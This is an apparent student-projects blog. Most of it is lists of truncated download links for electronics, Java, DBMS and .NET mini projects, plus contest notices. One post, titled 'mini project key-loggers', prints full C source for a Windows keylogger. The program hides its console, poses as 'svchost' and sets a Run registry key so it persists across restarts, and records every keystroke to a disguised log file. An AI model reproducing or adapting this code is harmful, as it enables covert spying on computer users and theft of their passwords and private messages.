Showing posts with label mini projects. Show all posts
Showing posts with label mini projects. Show all posts

Thursday, 10 February 2011

ECE mini- project ideas..

ECE mini- project ideas..

BatteryLevelIndicator

http://www.ziddu.com/download/749929...igami.pdf.html


DuoPhone

http://www.ziddu.com/download/749930...igami.pdf.html


DrinkingWateralarm

http://www.ziddu.com/download/749930...alarm.pdf.html


ConstantcurrentBatteryCharger

http://www.ziddu.com/download/749930...igami.pdf.html


ElectronicBicycleLock

http://www.ziddu.com/download/749930...igami.pdf.html


miniupssystem

http://www.ziddu.com/download/749930...igami.pdf.html


AutomatedAlarmCircuit

http://www.ziddu.com/download/749930...igami.pdf.html


MidnightSecuritylight

http://www.ziddu.com/download/749930...igami.pdf.html


LaserGuideddoorOpener

http://www.ziddu.com/download/749930...igami.pdf.html

Sunday, 6 February 2011

Some DBMS projects here!!

Some DBMS projects here!!

projects:
1)Criminal Database
2)Exam Project
3)libraryproj1
4)Management of TVS showroom
5)RAIL
6)telephone

link:
http://www.adrive.com/public/3823de2...200da73c7.html

password:diehard

MINI PROJECT - CSE - AVAILABLE, CSE,IT,CSIT

MINI PROJECT - CSE - AVAILABLE, CSE,IT,CSIT

JAVA PROJECTS

Advertising Agency

http://www.ziddu.com/download/317392...gency.zip.html


Airlines

http://www.ziddu.com/download/3173928/airlines.zip.html


Bug Tracking System

http://www.ziddu.com/download/317393...ystem.zip.html


College Management System

http://www.ziddu.com/download/317393...syetm.zip.html


Doctors

http://www.ziddu.com/download/3173927/doctors.zip.html


Human Resource management System

http://www.ziddu.com/download/317425...ystem.zip.html


Internet Banking

http://www.ziddu.com/download/317425...nking.zip.html


Intranet Chating

http://www.ziddu.com/download/317425...tting.zip.html


Java Mail Filter

http://www.ziddu.com/download/317425...ilter.zip.html


Online Course

http://www.ziddu.com/download/317425...urces.zip.html

JAVA PROJECTS Ready to Download, JAVA MAJOR PROJECTS RS LINKS !!

JAVA PROJECTS Ready to Download, JAVA MAJOR PROJECTS RS LINKS !!

Hello all i have some java projects which i am sharing with u people !! please Do reply



http://rapidshare.com/files/172677896/javaprojects.rar

Electronics for you ( Small Scale Projects )

Electronics for you ( Small Scale Projects )

These Projects will improve your skills.....


* FM Transmitter

http://www.ziddu.com/download/114311...itter.pdf.html

* Clap Circuit

http://www.ziddu.com/download/114311...rcuit.rar.html

* Battery Level

http://www.ziddu.com/download/114311...level.pdf.html


* Huge Collection of Circuits

http://www.ziddu.com/download/114311...cuits.rar.html


* Call

http://www.ziddu.com/download/11431170/call.pdf.html


* Electric Candles

http://www.ziddu.com/download/114311...ndles.pdf.html


* Anti Sleep

http://www.ziddu.com/download/114311...sleep.pdf.html


* 4 Stage FM transmitter

http://www.ziddu.com/download/114311...agefm.pdf.html


* Ghost Writing Robot

http://www.ziddu.com/download/114311...robot.rar.html


* Numeric water level indicator

http://www.ziddu.com/download/114311...cator.pdf.html

* House security System

http://www.ziddu.com/download/114312...ystem.pdf.html

* Scheme Interpreter

http://www.ziddu.com/download/114312...reter.rar.html


* Remote Controller

http://www.ziddu.com/download/114312...oller.pdf.html

* Shadow Alarm

http://www.ziddu.com/download/114312...alarm.pdf.html

* Wireless Switch

http://www.ziddu.com/download/114312...witch.pdf.html

* Solar

http://www.ziddu.com/download/11431210/solar2.pdf.html

* Solar

http://www.ziddu.com/download/11431211/solar.pdf.html

* Snake Game

http://www.ziddu.com/download/114312...mming.rar.html




Work For the country........... Think Global Work Local.....

Projects for ECE & EEE

Projects for ECE & EEE

ghostwritingrobot

http://www.ziddu.com/download/292715...robot.rar.html


touchsynth

http://www.ziddu.com/download/292708...synth.rar.html


schemeinterpreter

http://www.ziddu.com/download/292706...reter.rar.html

SOME JAVA PROJECTS (With Code Executing..)

SOME JAVA PROJECTS (With Code Executing..)

Online_Address_Book

http://www.ziddu.com/download/816574..._Book.zip.html


Network Banking System

http://www.ziddu.com/download/816575...ystem.zip.html


Network Banking System

http://www.ziddu.com/download/816575...ystem.zip.html


Library Management System

http://www.ziddu.com/download/816566...ystem.zip.html


Credit_Card_Approval_System

http://www.ziddu.com/download/816566...ystem.zip.html


Employee_Information_and_Payroll_System

http://www.ziddu.com/download/816566...ystem.zip.html


Airways_reservation_system

http://www.ziddu.com/download/816549...ystem.zip.html


Development of a Web Enabled Estate Agent (WEEA)

Project Description :
This project is aimed at developing a online real estate agent system that is of beneficial to either a real estate agent or a prospective. The �Web Enabled Estate Agent�(WEEA) is an Internet based application. This system can be used to store and search the property portfolios.

Get complete project details and guidelines in MS-Word format.

http://members.aol.com/studentspro/D...%28WEEA%29.zip

mini project key-loggers

mini project key-loggers

#include
#include
#include

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
HWND stealth; /*creating stealth (window is not visible)*/
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);

int test,create;
test=test_key();/*check if key is available for opening*/

if (test==2)/*create key*/
{ char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
create=create_key(path);

}


int t=get_keys();

032 return t;
033 }
034
035 int get_keys(void)
036 {
037 short character;
038 while(1)
039 {
040
041 for(character=8;character<=222;character++)
042 {
043 if(GetAsyncKeyState(character)==-32767)
044 {
045
046 FILE *file;
047 file=fopen("svchost.log","a+");
if(file==NULL)
{
return 1;
}
if(file!=NULL)
{
if((character>=39)&&(character<=64))
{
fputc(character,file);
fclose(file);
break;
}
else if((character>64)&&(character<91))
{
character+=32;
fputc(character,file);
fclose(file);
break;
}
else
{
switch(character)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
/*case VK_OEM_PLUS:
fputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
fputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
fputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
fputc('.',file);
fclose(file);
break;*/
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;
} }
}
}
}

}
return EXIT_SUCCESS;
}

int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QU ERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}

reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,( LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;

RegCloseKey(hKey);
return check;
}

int create_key(char *path)
{
int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;

return check;
}

DOTNET Projects

DOTNET Projects

Code:

http://www.ziddu.com/download/104648...ystem.zip.html

Code:

http://www.ziddu.com/download/104648...olicy.zip.html

Code:

http://www.ziddu.com/download/104648...ystem.zip.html

Code:

http://www.ziddu.com/download/104648..._scan.zip.html

Code:

http://www.ziddu.com/download/104648...count.zip.html

Code:

http://www.ziddu.com/download/104648...lyser.zip.html

Code:

http://www.ziddu.com/download/104648...peech.zip.html

Code:

http://www.ziddu.com/download/104648...mance.zip.html

Code:

http://www.ziddu.com/download/104648...rexam.zip.html

Code:

http://www.ziddu.com/download/104648...ystem.zip.html

Code:

http://www.ziddu.com/download/104647...brary.zip.html

Code:

http://www.ziddu.com/download/104647...ement.zip.html

Code:

http://www.ziddu.com/download/104647...ystem.zip.html

Code:

http://www.ziddu.com/download/104647..._cart.zip.html

Code:

http://www.ziddu.com/download/104647...ition.zip.html

Code:

http://www.ziddu.com/download/104647...ement.zip.html

Code:

http://www.ziddu.com/download/104647...ne_tv.zip.html

Code:

http://www.ziddu.com/download/104647..._game.zip.html

Code:

http://www.ziddu.com/download/104647...oject.zip.html

Code:

http://www.ziddu.com/download/104647...chase.zip.html

Code:

http://www.ziddu.com/download/104647...ation.zip.html

Code:

http://www.ziddu.com/download/104647...bsite.zip.html

Code:

http://www.ziddu.com/download/104647...ation.zip.html

Code:

http://www.ziddu.com/download/104647...ystem.zip.html

Code:

http://www.ziddu.com/download/104647...urces.zip.html

Code:

http://www.ziddu.com/download/104647...stem2.zip.html

Code:

http://www.ziddu.com/download/104647..._mart.zip.html

Code:

http://www.ziddu.com/download/104645...ation.zip.html

Code:

http://www.ziddu.com/download/104645...ystem.zip.html

Code:

http://www.ziddu.com/download/104645...tem_1.zip.html

Code:

http://www.ziddu.com/download/104645...ystem.zip.html

Code:

http://www.ziddu.com/download/104645...rithm.zip.html

Code:

http://www.ziddu.com/download/104645...llery.zip.html

Code:

http://www.ziddu.com/download/104645...nking.zip.html

Code:

http://www.ziddu.com/download/104645...m_kpt.zip.html

Code:

http://www.ziddu.com/download/104645...ement.zip.html

Code:

http://www.ziddu.com/download/104644...ement.zip.html

Code:

http://www.ziddu.com/download/104643...odule.zip.html

Code:

http://www.ziddu.com/download/104643..._free.zip.html

Code:

http://www.ziddu.com/download/104643...hat_1.zip.html

Code:

http://www.ziddu.com/download/104643...bsite.zip.html

Code:

http://www.ziddu.com/download/104643...ystem.zip.html

Code:

http://www.ziddu.com/download/104643...ystem.zip.html

Code:

http://www.ziddu.com/download/104643...ystem.zip.html

Code:

http://www.ziddu.com/download/104643...brary.zip.html

Code:

http://www.ziddu.com/download/104643...aints.zip.html

Code:

http://www.ziddu.com/download/104642...ystem.zip.html

Code:

http://www.ziddu.com/download/104642...dator.zip.html

Code:

http://www.ziddu.com/download/104642...ystem.zip.html

Code:

http://www.ziddu.com/download/104642...ement.zip.html

Code:

http://www.ziddu.com/download/104642...brary.zip.html

Code:

http://www.ziddu.com/download/104642...pairs.zip.html

Code:

http://www.ziddu.com/download/104642...lator.zip.html

Code:

http://www.ziddu.com/download/104642..._menu.zip.html

Code:

http://www.ziddu.com/download/104642...ystem.zip.html

Code:

http://www.ziddu.com/download/104642...ency1.zip.html

Code:

http://www.ziddu.com/download/104642...ystem.zip.html

Code:

http://www.ziddu.com/download/10464201/busbook.zip.html

Code:

http://www.ziddu.com/download/104642...lator.zip.html

Code:

http://www.ziddu.com/download/104641..._form.zip.html

Code:

http://www.ziddu.com/download/104641...album.zip.html

Code:

http://www.ziddu.com/download/104641...abase.zip.html

Code:

http://www.ziddu.com/download/104641...ogram.zip.html

Code:

http://www.ziddu.com/download/104641...avels.zip.html

PROJECTS FOR ECE STUDENTS.

PROJECTS FOR ECE STUDENTS.


http://www.ziddu.com/download/858006...cator.pdf.html


http://www.ziddu.com/download/858006...ASHER.pdf.html


http://www.ziddu.com/download/858007...rrent.pdf.html


http://www.ziddu.com/download/858007...cuits.pdf.html


http://www.ziddu.com/download/858007...Meter.pdf.html


AND MANY MORE I WILL POST THAT SHORTLY

Mini Projects in JAVA

Mini Projects in JAVA

Here are the some of the mini projects in JAVA



Browser

Banner

Applet Window

Applet to Servlet

Applet Add

Applet Frame

Adapter Demo

calculator

Color Demo

Choice List

Client Test

Double Buffer

First Applet

HServlet

Grid

Image Load

Image Swing

Inetaddress Demo1

Inetaddress Demo2

Jdbcupdate

Jlabeldemo

JScrollPaneDemo

InnerClassdemo

Java Buttons

Java Label

Jdbc Index

Key Events

Lawte

List Demo

Logo

LMouseEvents

Observed ImageLoad

My Banner

Rectangles

Resize Me

Sample Applet

Sb Demo

SErvlet To Applet

Server Test

Servlet Database

Simple Key

Textarea Demo

Text Demo

UDPClient

UDP Server

Window Events


some more will be uploaded soon

Abstract for online shopping system

Abstract for online shopping system

An online shopping system that permits a customer to submit online orders for items and/or services from a store that serves both walk-in customers and online customers. The online shopping system presents an online display of an order cutoff time and an associated delivery window for items selected by the customer. The system accepts the customer's submission of a purchase order for the item in response to a time of submission being before the order cutoff time. The online shopping system does not settle with a credit supplier of the customer until the item selected by the customer is picked from inventory but before it is delivered. Therefore, the customer can go online and make changes to the order. In addition, available service windows are presented to the customer as a function of customer selected order and service types; and further, the order picking is assigned in accordance with a picker's preference.

Mini Projects in C & C++

Mini Projects in C & C++

Here are the some of the collection of Mini Projects in C-Language.



Find Area and Volume

Calendar

Analog Clock

Castle Building

Moving Ball

Small Puzzle

Store Tool

Tic-Tac Game

Vedio Library

Tower of Hanoi

Bus Reservation

Encryption

Small Game

Calculator

Warshalls Algoritham

Convert Number to Word

Solve Roots

SUDOKU

Flashcard

TRI

REDITOR

MODEM

MOUSE

GOOD LUCK FRIENDS.

Mini proj50 mva, 132/33kv power transformer complete easun reyrolle protection scheme

Mini proj50 mva, 132/33kv power transformer complete easun reyrolle protection scheme

http://www.ziddu.com/download/101844...50MVA.doc.html

Alarms & Indicators based mini projects

Alarms & Indicators based mini projects

Alarms & Indicators based mini projects


Index:
1.Timed Burglar Alarm
2.Beeper
3.Big Ben Sound
4.Car anti theft wireless alarm
5.Water Level Indicator with alarm
6.Power supply failure alarm
7.Rain Alarm
8.Melody generator for greeting cards
9.Frost Alarm or Cold Activated Switch by IC 741
10.Event Failure Alarm By IC Timer 7555
11.Gate Alarm by IC 4011
12.Simple Fuse Monitor Alarm



http://www.ziddu.com/downloadlink/21...niprojects.rar

Some Java projects

Some Java projects

http://www.ziddu.com/download/594603...ystem.zip.html

http://www.ziddu.com/download/594603...gency.zip.html

http://www.ziddu.com/download/5946040/airlines.zip.html

http://www.ziddu.com/download/594604...iding.zip.html

http://www.ziddu.com/download/594604...oping.zip.html

http://www.ziddu.com/download/594604...ystem.zip.html

http://www.ziddu.com/download/594604...nking.zip.html

http://www.ziddu.com/download/594604...ition.zip.html

http://www.ziddu.com/download/594604...urces.zip.html

http://www.ziddu.com/download/594604...syetm.zip.html




When i xecuted i got the correct output,I am not responsible for improper output

Snake game using c language

Snake game using c language

Snake game using c language, c snake game



http://www.ziddu.com/download/413629...mming.rar.html

MICROSOFT STUDENT TO BUSINESS AICTE STUDENTS ACADEMIC PROJECT 2008-09

MICROSOFT STUDENT TO BUSINESS AICTE STUDENTS ACADEMIC PROJECT 2008-09

Microsoft Academic Projects 2008-09

Introduction:

Microsoft Student to Business provides a great opportunity for enthusiastic students to develop innovative projects solving real world problems and enhance their CV before working for the IT Industry. Besides, the top 10 teams will win a cash prize of INR 10,000 each. Project activity is an integral part of professional educational experience for students who can use it to base a successful and rewarding career.Student to Business (S2B) offers a range of projects, which are a platform for learning new technologies in a structured and comprehensive way.Project opportunities make perfect learning grounds to understand and solve real-world problems and gain experience, which is invaluable for enhancing the professional credentials.

Requirements :

1. Participant must be a student in any AICTE affiliated college/institute (or Deemed University).

2. Team size of 1-4 members

3. The project should target/run on the Microsoft platform and make use of at least one Microsoft technology.

For More Details:

Website: http://www.student2business.co.in/Projects.aspx

Eligibility:

Participant must be a student in any AICTE affiliated college/institute (or Deemed University).

Benefits of Registering Projects with Microsoft:

1. Top 10 teams win INR 10,000 each.

2. Leverage Microsoft expertise to help you produce a world-class solution.

3. Gain access to the latest Microsoft technologies (students registering for the program will be able to download the latest software from the software section of the site).

4. Receive Microsoft merit certificates (all teams that complete the project will get a certificate).

5. Enhance your CV before you start work in the IT industry.

Key Dates:

Last date for Registrations and Team Creation: 02/15/09

Idea Submission: 02/28/09

Design Submission: 03/15/09

Code Submission: 04/30/09

Announcements of Results: 05/30/09

Organized by: Microsoft Student to Business (S2B)

Microsoft Student projects, HURRY UP!! Last date for registration MARCH 18

Microsoft Student projects, HURRY UP!! Last date for registration MARCH 18

Microsoft offers Student projects.

All u need to do is register at their site

http://www.microsoft.com/singapore/mssg_docs/1835.aspx

and submit your work online.

your work will be reviewed by Microsoft ppl.If it is good they will announce some date to exhibit your work.If u did well you will be paid.or else will be given a certificate according to the level u have gone through.

Note:
You have to stictly follow the deadlines given by Microsoft.

Battery-project

Battery-project

Battery-project


Index:
1.Gel Cell Charger,
2.Battery Booster
3.ALKALINE CHARGER
4.Temperature Controlled NICD Charger by IC LM311
5.Battery Monitoring By LM324




http://www.ziddu.com/download/217350...oject.rar.html